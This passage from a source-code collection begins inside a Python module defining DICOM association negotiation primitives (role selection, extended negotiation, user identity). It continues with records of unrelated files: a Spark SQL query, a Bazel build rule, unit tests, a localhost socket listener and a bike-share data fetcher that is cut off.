disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n LOGGER.error(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"Implementation Class UID is an invalid UID\")\n raise ValueError(\"Implementation Class UID is an invalid UID\")\n\n self._sop_class_uid = value\n\n @property\n def scu_role(self):\n \"\"\"Return the SCU Role.\"\"\"\n return self._scu_role\n\n @scu_role.setter\n def scu_role(self, value):\n \"\"\"Sets the SCU Role parameter.\n\n Parameters\n ----------\n value : bool\n True if supported, False otherwise\n\n Raises\n ------\n TypeError\n If `value` is not a bool\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bool):\n pass\n elif value is None:\n pass\n 
else:\n LOGGER.error(\"SCU Role must be boolean\")\n raise TypeError(\"SCU Role must be boolean\")\n\n self._scu_role = value\n\n @property\n def scp_role(self):\n \"\"\"Return the SCP Role.\"\"\"\n return self._scp_role\n\n @scp_role.setter\n def scp_role(self, value):\n \"\"\"Sets the SCP Role parameter.\n\n Parameters\n ----------\n value : bool\n True if supported, False otherwise (default)\n\n Raises\n ------\n TypeError\n If `value` is not a bool\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bool):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"SCP Role must be boolean\")\n raise TypeError(\"SCP Role must be boolean\")\n\n self._scp_role = value\n\n\nclass SOPClassExtendedNegotiation(ServiceParameter):\n \"\"\"\n Allows peer AEs to exchange application information defined by specific\n Service Class specifications. Each Service Class is required to document\n the application information it supports and how this information is\n negotiated between SCUs and SCPs.\n\n The SOP Class Extended Negotiation is optional and there may only be a\n single SOPClassExtendedNegotiation item for each available SOP Class UID.\n\n PS3.7 Annex D.3.3.5\n\n PS3.4 contains Service Class Specifications\n\n Identical for both A-ASSOCIATE-RQ and A-ASSOCIATE-AC\n\n Attributes\n ----------\n sop_class_uid : pydicom.uid.UID, bytes or str\n The UID of the SOP Class\n service_class_application_information : bytes\n The Service Class Application Information as per the Service Class\n Specifications (see PS3.4)\n \"\"\"\n\n def __init__(self):\n self.sop_class_uid = None\n self.service_class_application_information = None\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.SOPClassExtendedNegotiationSubItem\n\n Raises\n ------\n ValueError\n If `sop_class_uid` or `service_class_application_information` are\n not set\n \"\"\"\n if self.sop_class_uid is None \\\n or self.service_class_application_information is None:\n LOGGER.error(\"SOP Class UID and Service Class Application \"\n \"Information must be set prior to Association \"\n \"negotiation\")\n raise ValueError(\"SOP Class UID and Service Class Application \"\n \"Information must be set prior to Association \"\n \"negotiation\")\n\n item = SOPClassExtendedNegotiationSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def sop_class_uid(self):\n \"\"\"Return the SOP Class UID.\"\"\"\n return self._sop_class_uid\n\n @sop_class_uid.setter\n def sop_class_uid(self, value):\n \"\"\"Sets the SOP Class UID parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The corresponding Abstract Syntax UID\n\n Raises\n ------\n TypeError\n If `value` is not a pydicom.uid.UID, bytes or str\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n LOGGER.error(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"Implementation Class UID is an invalid UID\")\n raise ValueError(\"Implementation Class UID is an invalid UID\")\n\n self._sop_class_uid = value\n\n @property\n def service_class_application_information(self):\n \"\"\"Return the Service 
Class Application Information.\"\"\"\n return self._service_class_application_information\n\n @service_class_application_information.setter\n def service_class_application_information(self, value):\n \"\"\"Sets the Service Class Application Information parameter.\n\n Parameters\n ----------\n value : bytes\n The Service Class Application Information as per the Service Class\n Specifications (see PS3.4)\n\n Raises\n ------\n TypeError\n If `value` is not a bytes object\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bytes):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"Service Class Application Information should be a \"\n \"bytes object\")\n raise TypeError(\"Service Class Application Information should \"\n \"be a bytes object\")\n\n self._service_class_application_information = value\n\n\nclass SOPClassCommonExtendedNegotiation(ServiceParameter):\n \"\"\"\n Allows peer AEs to exchange generic application information.\n\n The SOP Class Common Extended Negotiation is optional and there may only be\n a single SOPClassCommonExtendedNegotiation item for each available SOP\n Class UID.\n\n PS3.7 Annex D.3.3.6\n\n Identical for both A-ASSOCIATE-RQ and A-ASSOCIATE-AC\n\n Attributes\n ----------\n sop_class_uid : pydicom.uid.UID, bytes or str\n The UID of the SOP Class\n service_class_uid : pydicom.uid.UID, bytes or str\n The UID of the corresponding Service Class\n related_general_sop_class_uid : list of (pydicom.uid.UID, bytes or str)\n Related General SOP Class UIDs (optional)\n \"\"\"\n\n def __init__(self):\n self.sop_class_uid = None\n self.service_class_uid = None\n self.related_general_sop_class_identification = []\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.SOPClassCommonExtendedNegotiationSubItem\n\n Raises\n ------\n ValueError\n If `sop_class_uid` or `service_class_uid` are not set\n \"\"\"\n if self.sop_class_uid is None or self.service_class_uid is None:\n LOGGER.error(\"SOP Class UID and Service Class UID must be set \"\n \"prior to Association negotiation\")\n raise ValueError(\"SOP Class UID and Service Class UID must be \"\n \"set prior to Association negotiation\")\n\n item = SOPClassCommonExtendedNegotiationSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def sop_class_uid(self):\n \"\"\"Return the SOP Class UID.\"\"\"\n return self._sop_class_uid\n\n @sop_class_uid.setter\n def sop_class_uid(self, value):\n \"\"\"Sets the SOP Class UID parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The SOP Class UID\n\n Raises\n ------\n TypeError\n If `value` is not a pydicom.uid.UID, bytes or str\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n LOGGER.error(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"Implementation Class UID is an invalid UID\")\n raise ValueError(\"Implementation Class UID is an invalid UID\")\n\n self._sop_class_uid = value\n\n @property\n def service_class_uid(self):\n \"\"\"Return the Service Class UID.\"\"\"\n return self._service_class_uid\n\n @service_class_uid.setter\n def service_class_uid(self, 
value):\n \"\"\"Sets the Service Class UID parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The corresponding Service Class UID\n\n Raises\n ------\n TypeError\n If `value` is not a pydicom.uid.UID, bytes or str\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n LOGGER.error(\"Service Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"Service Class UID must be a pydicom.uid.UID, \"\n \"str or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"Implementation Class UID is an invalid UID\")\n raise ValueError(\"Implementation Class UID is an invalid UID\")\n\n self._service_class_uid = value\n\n @property\n def related_general_sop_class_identification(self):\n \"\"\"Return the Related General SOP Class Identification\"\"\"\n return self._related_general_sop_class_identification\n\n @related_general_sop_class_identification.setter\n def related_general_sop_class_identification(self, uid_list):\n \"\"\"Sets the Service Class Application Information parameter.\n\n Parameters\n ----------\n uid_list : list of (pydicom.uid.UID, bytes or str)\n A list containing UIDs to be used in the Related General SOP Class\n Identification parameter\n\n Raises\n ------\n TypeError\n If `uid_list` is not a list\n ValueError\n If `uid_list` contains items that aren't UIDs\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(uid_list, list):\n # Test that all the items in the list are UID compatible and convert\n # them to pydicom.uid.UID if required\n valid_uid_list = []\n\n for uid in uid_list:\n if isinstance(uid, UID):\n pass\n elif isinstance(uid, str):\n uid = UID(uid)\n elif isinstance(uid, bytes):\n uid = UID(uid.decode('utf-8'))\n else:\n LOGGER.error(\"Related General SOP Class Identification \"\n \"must be a list of pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"Related General SOP Class \"\n \"Identification must be a list of \"\n \"pydicom.uid.UID, str or bytes\")\n\n if uid is not None and not uid.is_valid:\n LOGGER.error(\"Related General SOP Class \"\n \"Identification contains an invalid UID\")\n raise ValueError(\"Related General SOP Class contains \"\n \"an invalid UID\")\n\n valid_uid_list.append(uid)\n\n self._related_general_sop_class_identification = valid_uid_list\n else:\n LOGGER.error(\"Related General SOP Class Identification \"\n \"must be a list of pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"Related General SOP Class Identification \"\n \"must be a list of pydicom.uid.UID, str \"\n \"or bytes\")\n\n\nclass UserIdentityNegotiation(ServiceParameter):\n \"\"\"\n Allows peer AEs to exchange generic application information.\n\n The SOP Class Common Extended Negotiation is optional and there may only be\n a single SOPClassCommonExtendedNegotiation item for each available SOP\n Class UID.\n\n PS3.7 Annex D.3.3.7\n\n In general, a User Identity Negotiation request that is accepted will result\n in Association establishment and possibly a server response if requested\n and supported by the peer. 
If a server response is requested but not\n received then the Requestor must decide how to proceed.\n An Association rejected due to an authorisation failure will be indicated\n using Rejection Permanent with a Source of \"DICOM UL service provided (ACSE\n related function)\".\n\n How the Acceptor handles authentication is to be implemented by the end-user\n and is outside the scope of the DICOM standard.\n\n A-ASSOCIATE-RQ\n `user_identity_type`\n `positive_response_requested`\n `primary_field`\n `secondary_field`\n\n A-ASSOCIATE-AC\n The `server_response` parameter is required when a response to the User\n Identity Negotiation request is to be issued (although this depends on\n whether or not this is supported by the Acceptor).\n\n Attributes\n ----------\n user_identity_type : int or None\n A-ASSOCIATE-RQ only. One of the following values:\n * 1 - Username as string in UTF-8\n * 2 - Username as string in UTF-8 and passcode\n * 3 - Kerberos Service ticket\n * 4 - SAML Assertion\n positive_response_requested : bool\n A-ASSOCIATE-RQ only. True when requesting a response, False otherwise\n (default is False)\n primary_field : bytes or None\n A-ASSOCIATE-RQ only. Contains either the username, Kerberos Service\n ticket or SAML assertion depending on `user_identity_type`.\n secondary_field : bytes or None\n A-ASSOCIATE-RQ only. Only required if the `user_identity_type` is 2,\n when it should contain the passcode as a bytes object, None otherwise\n server_response : bytes or None\n A-ASSOCIATE-AC only. Shall contain the Kerberos Service ticket or SAML\n response if the `user_identity_type` in the Request was 3 or 4. Shall be\n None if `user_identity_type` was 1 or 2.\n \"\"\"\n\n def __init__(self):\n self.user_identity_type = None\n self.positive_response_requested = False\n self.primary_field = None\n self.secondary_field = None\n self.server_response = None\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.UserIdentitySubItemRQ or\n pynetdicom3.pdu.UserIdentitySubItemAC\n\n Raises\n ------\n ValueError\n If server_response is None and user_identity_type or primary_field\n are None\n ValueError\n If server_response is None and user_identity_type is 2 and\n secondary_field is None\n \"\"\"\n # Determine if this primitive is an -RQ or -AC\n if self.server_response is None:\n # Then an -RQ\n if self.user_identity_type is None or self.primary_field is None:\n LOGGER.error(\"User Identity Type and Primary Field must be \"\n \"set prior to Association negotiation\")\n raise ValueError(\"User Identity Type and Primary Field \"\n \"must be set prior to Association negotiation\")\n\n if self.user_identity_type == 2 and self.secondary_field is None:\n LOGGER.error(\"Secondary Field must be set when User Identity\"\n \"is 2\")\n raise ValueError(\"Secondary Field must be set when User \"\n \"Identity is 2\")\n\n item = UserIdentitySubItemRQ()\n\n else:\n # Then an -AC\n item = UserIdentitySubItemAC()\n\n item.FromParams(self)\n\n return item\n\n @property\n def user_identity_type(self):\n \"\"\"Return the User Identity Type.\"\"\"\n return self._user_identity_type\n\n @user_identity_type.setter\n def user_identity_type(self, value):\n \"\"\"Sets the User Identity Type parameter.\n\n Parameters\n ----------\n value : int\n One of the following:\n * 1 - Username as string in UTF-8\n * 2 - Username as string in UTF-8 and passcode\n * 3 - Kerberos Service ticket\n * 4 - SAML Assertion\n\n Raises\n ------\n 
TypeError\n If `value` is not an int or None\n ValueError\n If `value` is an int and is not 1, 2, 3 or 4\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, int):\n if value not in [1, 2, 3, 4]:\n LOGGER.error(\"User Identity Type must be 1, 2 3 or 4 if \"\n \"requesting Association, None otherwise\")\n raise ValueError(\"User Identity Type must be 1, 2 3 or 4 \"\n \"if requesting Association, None otherwise\")\n elif value is None:\n pass\n else:\n LOGGER.error(\"User Identity Type must be an int or None\")\n raise TypeError(\"User Identity Type must be an int or None\")\n\n self._user_identity_type = value\n\n @property\n def positive_response_requested(self):\n \"\"\"Return Positive Response Requested.\"\"\"\n return self._positive_response_requested\n\n @positive_response_requested.setter\n def positive_response_requested(self, value):\n \"\"\"Sets the Positive Response Requested parameter.\n\n Parameters\n ----------\n value : bool\n True if response requested, False otherwise\n\n Raises\n ------\n TypeError\n If `value` is not a bool\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bool):\n pass\n else:\n LOGGER.error(\"Positive Response Requested must be boolean\")\n raise TypeError(\"Positive Response Requested must be boolean\")\n\n self._positive_response_requested = value\n\n @property\n def primary_field(self):\n \"\"\"Return Primary Field.\"\"\"\n return self._primary_field\n\n @primary_field.setter\n def primary_field(self, value):\n \"\"\"Sets the Primary Field parameter.\n\n Parameters\n ----------\n value : bytes or None\n The username or Kerberos Service ticket as a bytes object\n\n Raises\n ------\n TypeError\n If `value` is not bytes or None\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bytes):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"Primary Field must be bytes if requesting \"\n \"Association, None otherwise\")\n raise TypeError(\"Primary Field must be bytes if requesting \"\n \"Association, None otherwise\")\n\n self._primary_field = value\n\n @property\n def secondary_field(self):\n \"\"\"Return the Secondary Field.\"\"\"\n return self._secondary_field\n\n @secondary_field.setter\n def secondary_field(self, value):\n \"\"\"Sets the Secondary Field parameter.\n\n Only used when User Identity Type is equal to 2.\n\n Parameters\n ----------\n value : bytes or None\n The passcode as a bytes object\n\n Raises\n ------\n TypeError\n If `value` is not bytes or None\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bytes):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"Secondary Field must be bytes if requesting \"\n \"Association with User Identity Type equal to 2, \"\n \"None otherwise\")\n raise TypeError(\"Secondary Field must be bytes if requesting \"\n \"Association with User Identity Type equal to 2, \"\n \"None otherwise\")\n\n self._secondary_field = value\n\n @property\n def server_response(self):\n \"\"\"Return the Server Response.\"\"\"\n return self._server_response\n\n @server_response.setter\n def server_response(self, value):\n \"\"\"Sets the Server Response parameter.\n\n Parameters\n ----------\n value : bytes or None\n The server response as a bytes object\n\n Raises\n ------\n TypeError\n If `value` is not bytes or None\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bytes):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"Server Response 
must be bytes or None\")\n raise TypeError(\"Server Response must be bytes or None\")\n\n self._server_response = value\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = 'User Identity Parameters\\n'\n if self.server_response is None:\n s += ' User identity type: {0:d}\\n'.format(\n self.user_identity_type)\n s += ' Positive response requested: {0!r}\\n' \\\n .format(self.positive_response_requested)\n s += ' Primary field: {0!s}\\n'.format(self.primary_field)\n s += ' Secondary field: {0!s}\\n'.format(self.secondary_field)\n else:\n s += ' Server response: {0!s}\\n'.format(self.server_response)\n\n return s\n","repo_name":"zdalih/wolfpacs","sub_path":"pnd3/pynetdicom3/pdu_primitives.py","file_name":"pdu_primitives.py","file_ext":"py","file_size_in_byte":77037,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
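A minimal usage sketch for the negotiation primitives defined in the record above. It only composes classes and attributes that the record itself defines (MaximumLengthNegotiation, ImplementationClassUIDNotification, SCP_SCU_RoleSelectionNegotiation and their from_primitive() methods); the import path mirrors the record's sub_path and the UID values are placeholders, not values taken from the repository.

# Hedged sketch: building a user_information list for an association request
# from the primitives above, then converting each one to its PDU sub-item.
from pynetdicom3.pdu_primitives import (
    MaximumLengthNegotiation,
    ImplementationClassUIDNotification,
    SCP_SCU_RoleSelectionNegotiation,
)

max_length = MaximumLengthNegotiation()
max_length.maximum_length_received = 16382       # 0 would mean "unlimited"

impl_uid = ImplementationClassUIDNotification()
impl_uid.implementation_class_uid = '1.2.826.0.1.3680043.9.3811.0.9.0'  # placeholder UID

role = SCP_SCU_RoleSelectionNegotiation()
role.sop_class_uid = '1.2.840.10008.5.1.4.1.1.2'  # CT Image Storage, as an example
role.scu_role = True
role.scp_role = False

user_information = [max_length, impl_uid, role]

# Each primitive encodes itself as the corresponding PDU sub-item:
pdu_items = [item.from_primitive() for item in user_information]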
+{"seq_id":"20111499961","text":"from pyspark.sql import SparkSession\nimport sys\nspark = SparkSession.builder.appName(\"Query3_SparkSQL\").getOrCreate()\n\n# The user must give the input format (csv || parquet)\n\n# For example:\n# spark-submit SparkSqlquery3.py csv\n# to read csv file\n\ninput_format = sys.argv[1]\n\nif input_format == 'parquet':\n movie_genres = spark.read.parquet(\"hdfs://master:9000/movies/movie_genres.parquet\")\n movies = spark.read.parquet(\"hdfs://master:9000/movies/movies.parquet\")\n ratings = spark.read.parquet(\"hdfs://master:9000/movies/ratings.parquet\")\nelse:\n movies = spark.read.option(\"header\",\"false\").option(\"delimiter\",\",\").option(\"inferSchema\",\"true\").csv(\"hdfs://master:9000/movies/movies.csv\")\n movie_genres = spark.read.option(\"header\",\"false\").option(\"delimiter\",\",\").option(\"inferSchema\",\"true\").csv(\"hdfs://master:9000/movies/movie_genres.csv\")\n ratings = spark.read.option(\"header\",\"false\").option(\"delimiter\",\",\").option(\"inferSchema\",\"true\").csv(\"hdfs://master:9000/movies/ratings.csv\")\n\nmovies.registerTempTable(\"movies\")\nratings.registerTempTable(\"ratings\")\nmovie_genres.registerTempTable(\"movie_genres\")\n\nsqlString = \"select a.Genre as Movie_Genre, avg(b.Rating) as Avg_Rating, count(b.ID) as No_of_movies \\\n from \\\n (select distinct _c1 as Genre, _c0 as aID from movie_genres)a \\\n inner join ( \\\n select distinct _c1 as ID, avg(_c2) as Rating from ratings where _c2 is not null group by _c1\\\n )b \\\n on a.aID = b.ID \\\n group by Genre\\\n order by Genre\"\n\nres = spark.sql(sqlString)\nres.show()","repo_name":"FayStatha/atds-project-NTUA-2021","sub_path":"code/PART A/Spark SQL/SparkSqlquery3.py","file_name":"SparkSqlquery3.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"38364513697","text":"\"\"\"Build Model assets from source 3d asset files like fbx, obj, gltf, etc.\"\"\"\n\nload(\"//third_party/fplbase:build_defs.bzl\", \"fpl_png_assets\")\n\ndef build_model(\n name,\n srcs,\n textures = [],\n extra_srcs = [],\n strip_prefix = \"\",\n attrib = None,\n ext = \"lullmodel\",\n visibility = [\"//visibility:public\"]):\n \"\"\"Generates a fplmesh binary from source files.\n\n Args:\n name: name for the filegroup contain the set of generated motiveanim files\n srcs: list of 3d asset files\n textures: list of all textures associated with the model\n strip_prefix: optional string, will be stripped from all input file paths\n in output file generation. All subdirectories after\n strip_prefix will be retained.\n attrib: a string specifying which vertex attributes should be output.\n ext: A file extension to replace each input file extension with for output.\n visibility: The visibility of the entity target. Defaults to public.\n \"\"\"\n tool = \"//lullaby/tools/model_pipeline\"\n\n outs = []\n textures_name = \"%s_textures\" % name\n if textures:\n fpl_png_assets(\n name = textures_name,\n srcs = textures,\n strip_prefix = strip_prefix,\n webp_quality = 90,\n )\n\n for src in srcs:\n # Replace source file extension with output file extension\n out = \".\".join(src.split(\".\")[:-1]) + \".\" + ext\n if strip_prefix:\n out = out.split(strip_prefix + \"/\")[-1]\n\n cmd = []\n if textures:\n cmd += [\"textures=\\\"\\\";\"]\n cmd += [\"for f in $(locations %s); do\" % (\":\" + textures_name)]\n cmd += [\" textures+=$$f\\\";\\\";\"]\n cmd += [\"done;\"]\n cmd += [\"$(location %s)\" % tool]\n cmd += [\"--input $(location %s)\" % src]\n cmd += [\"--schema schemas/lull/model_pipeline_def.fbs\"]\n if attrib:\n cmd += [\"--attrib %s\" % attrib]\n if ext:\n cmd += [\"--ext %s\" % ext]\n cmd += [\"--outdir $(@D)\"]\n cmd += [\"--output $@\"]\n genrule_srcs = [src]\n if textures:\n cmd += [\"--textures \\\"$$textures\\\";\"]\n genrule_srcs += [\":\" + textures_name]\n if extra_srcs:\n genrule_srcs += extra_srcs\n\n native.genrule(\n name = \"build_%s\" % out,\n srcs = genrule_srcs,\n tools = [\"//:model_schema\"] + [tool],\n outs = [out],\n cmd = \" \".join(cmd),\n )\n outs += [out]\n\n native.filegroup(name = name, srcs = outs, visibility = visibility)\n","repo_name":"google/lullaby","sub_path":"dev/build_model.bzl","file_name":"build_model.bzl","file_ext":"bzl","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","stars":1170,"dataset":"github-code","pt":"16"}
+{"seq_id":"17417091053","text":"import pytest\nfrom pathlib import Path\nimport json\n\nfrom bluepyemodel.access_point import get_access_point\nfrom dictdiffer import diff\n\nTEST_ROOT = Path(__file__).parents[1]\nDATA = TEST_ROOT / \"test_data\"\n\n\n@pytest.fixture\ndef api_config():\n return {\n \"emodel\": \"cADpyr_L5TPC\",\n \"emodel_dir\": DATA,\n \"recipes_path\": DATA / \"config/recipes.json\",\n }\n\n\n@pytest.fixture\ndef db(api_config):\n return get_access_point(\"local\", **api_config)\n\n\ndef test_get_morphologies(db):\n morphology = db.get_morphologies()\n assert morphology[\"name\"] == \"C060114A5\"\n assert Path(morphology[\"path\"]).name == \"C060114A5.asc\"\n\n\ndef test_get_available_morphologies(db):\n names = db.get_available_morphologies()\n assert len(names) == 1\n assert list(names)[0] == \"C060114A5\"\n\n\ndef test_get_recipes(db):\n recipes = db.get_recipes()\n # json.dump(recipes, open(DATA / \"test_recipes.json\", \"w\"))\n expected_recipes = json.load(open(DATA / \"test_recipes.json\", \"r\"))\n assert list(diff(recipes, expected_recipes)) == []\n\n\ndef test_get_model_configuration(db):\n\n configuration = db.get_model_configuration()\n\n expected_parameters = json.load(open(DATA / \"test_parameters.json\", \"r\"))\n expected_mechanisms = json.load(open(DATA / \"test_mechanisms.json\", \"r\"))\n\n for p in configuration.parameters:\n assert p.location in expected_parameters[\"parameters\"]\n for ep in expected_parameters[\"parameters\"][p.location]:\n if ep[\"name\"] == p.name and ep[\"val\"] == p.value:\n break\n else:\n raise Exception(\"missing parameter\")\n\n assert sorted(list(configuration.mechanism_names)) == [\n \"CaDynamics_DC0\",\n \"Ca_HVA2\",\n \"Ca_LVAst\",\n \"Ih\",\n \"K_Pst\",\n \"K_Tst\",\n \"NaTg\",\n \"Nap_Et2\",\n \"SK_E2\",\n \"SKv3_1\",\n \"pas\",\n ]\n\n\ndef test_get_final(db):\n final = db.get_final()\n assert \"cADpyr_L5TPC\" in final\n assert \"parameters\" in final[\"cADpyr_L5TPC\"] or \"params\" in final[\"cADpyr_L5TPC\"]\n\n\ndef test_load_pipeline_settings(db):\n assert db.pipeline_settings.path_extract_config == \"tests/test_data/config/config_dict.json\"\n assert db.pipeline_settings.validation_protocols == [\"APWaveform_140\"]\n\n\ndef test_get_model_name_for_final(db):\n db.emodel_metadata.iteration = \"\"\n assert db.get_model_name_for_final(seed=42) == \"cADpyr_L5TPC__42\"\n db.emodel_metadata.iteration = None\n assert db.get_model_name_for_final(seed=42) == \"cADpyr_L5TPC__42\"\n db.emodel_metadata.iteration = \"hash\"\n assert db.get_model_name_for_final(seed=42) == \"cADpyr_L5TPC__hash__42\"\n\n\ndef test_get_ion_currents_concentrations(db):\n expected_ion_currents = {\n \"ica_Ca_HVA2\",\n \"ica_Ca_LVAst\",\n \"ik_K_Pst\",\n \"ik_K_Tst\",\n \"ina_NaTg\",\n \"ina_Nap_Et2\",\n \"ik_SK_E2\",\n \"ik_SKv3_1\",\n \"ihcn_Ih\",\n \"i_pas\",\n }\n expected_ionic_concentrations = {\n \"cai\",\n \"ki\",\n \"nai\",\n }\n ion_currents, ionic_concentrations = db.get_ion_currents_concentrations()\n assert set(ion_currents) == expected_ion_currents\n assert set(ionic_concentrations) == expected_ionic_concentrations\n","repo_name":"BlueBrain/BluePyEModel","sub_path":"tests/unit_tests/test_local_access_point.py","file_name":"test_local_access_point.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"43471419510","text":"#!/usr/bin/env python3\n\nimport datetime\nimport socket\n\n\nHOST = \"localhost\"\nPORT = 49281\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST, PORT))\n print(\"bound\")\n s.listen()\n print(f\"listening on {HOST}:{PORT}\")\n while True:\n conn, addr = s.accept()\n with conn:\n print(\"Connected by\", addr)\n buf = b\"\"\n old_rx_time = None\n old_time = 0\n times = []\n while True:\n try:\n data = conn.recv(1024)\n except OSError:\n break\n if not data:\n break\n\n rx_time = datetime.datetime.now()\n if old_rx_time is not None:\n delta = rx_time - old_rx_time\n else:\n delta = None\n old_rx_time = rx_time\n buf += data\n (*frames, buf) = buf.split(b\"\\r\")\n for frame in frames:\n if (\n not frame\n and delta is not None\n and delta > datetime.timedelta(seconds=0.9)\n ):\n times.append(delta.total_seconds())\n print(sum(times) / len(times))\n # conn.send(b\"ACK \" + frame + b\"\\r\")\n print(\"[{} ({})]: {}\".format(rx_time.isoformat(), delta, frame))\n print(\"disconnected\")\n","repo_name":"dtwood/paging-gpio-firmware","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37054830706","text":"import requests\nimport json\nfrom pprint import pprint\nfrom pymongo import MongoClient\n\n\ndef get_vlille():\n url = \"https://opendata.lillemetropole.fr/api/records/1.0/search/?dataset=vlille-realtime&q=&rows=300&facet=libelle&facet=nom&facet=commune&facet=etat&facet=type&facet=etatconnexion\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n response_json = json.loads(response.text.encode('utf8'))\n return response_json.get(\"records\", [])\n\n\ndef get_vrennes():\n # url = \"https://data.rennesmetropole.fr/api/records/1.0/search/?dataset=etat-des-stations-le-velo-star-en-temps-reel&q=&facet=nom&facet=etat&facet=nombreemplacementsactuels&facet=nombreemplacementsdisponibles&facet=nombrevelosdisponibles\"\n url = \"https://data.rennesmetropole.fr/api/records/1.0/search/?dataset=stations_vls&q=&rows=3000\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n response_json = json.loads(response.text.encode('utf8'))\n return response_json.get(\"records\", [])\n\n\ndef get_vlyon():\n # url = \"https://download.data.grandlyon.com/ws/rdata/jcd_jcdecaux.jcdvelov/all.json?maxfeatures=100&start=1\"\n url = \"https://public.opendatasoft.com/api/records/1.0/search/?dataset=station-velov-grand-lyon&q=&facet=name&facet=status&rows=500\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n response_json = json.loads(response.text.encode('utf8'))\n return response_json.get(\"records\", [])\n\n\ndef get_vparis():\n url = \"https://opendata.paris.fr/api/records/1.0/search/?dataset=velib-disponibilite-en-temps-reel&q=&facet=name&facet=is_renting&rows=300\"\n # url = \"https://opendata.paris.fr/api/records/1.0/search/?dataset=velib-emplacement-des-stations&q=\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n response_json = json.loads(response.text.encode('utf8'))\n return response_json.get(\"records\", [])\n\n\nvlilles = get_vlille()\nvrennes = get_vrennes()\nvlyon = get_vlyon()\nvparis = get_vparis()\n\nvlliles_to_insert = [\n {\n 'name': elem.get('fields', {}).get('nom', ''),\n 'geometry': elem.get('geometry'),\n 'size': elem.get('fields', {}).get('nbvelosdispo') + elem.get('fields', {}).get('nbplacesdispo'),\n 'source': {\n 'dataset': 'Lille',\n 'id_ext': elem.get('fields', {}).get('libelle')\n },\n 'tpe': elem.get('fields', {}).get('type', '') == 'AVEC TPE',\n 'available': elem.get('fields', {}).get('etat', '') == 'EN SERVICE'\n }\n for elem in vlilles\n]\n\nvrennes_to_insert = [\n {\n 'name': elem.get('fields', {}).get('nom', ''),\n 'geometry': elem.get('geometry'),\n 'size': elem.get('fields', {}).get('nb_socles'),\n 'source': {\n 'dataset': 'Rennes',\n 'id_ext': elem.get('fields', {}).get('objectid')\n },\n 'tpe': elem.get('fields', {}).get('tpe', '') == 'oui',\n 'available': elem.get('fields', {}).get('etat', '') == 'Ouverte'\n }\n for elem in 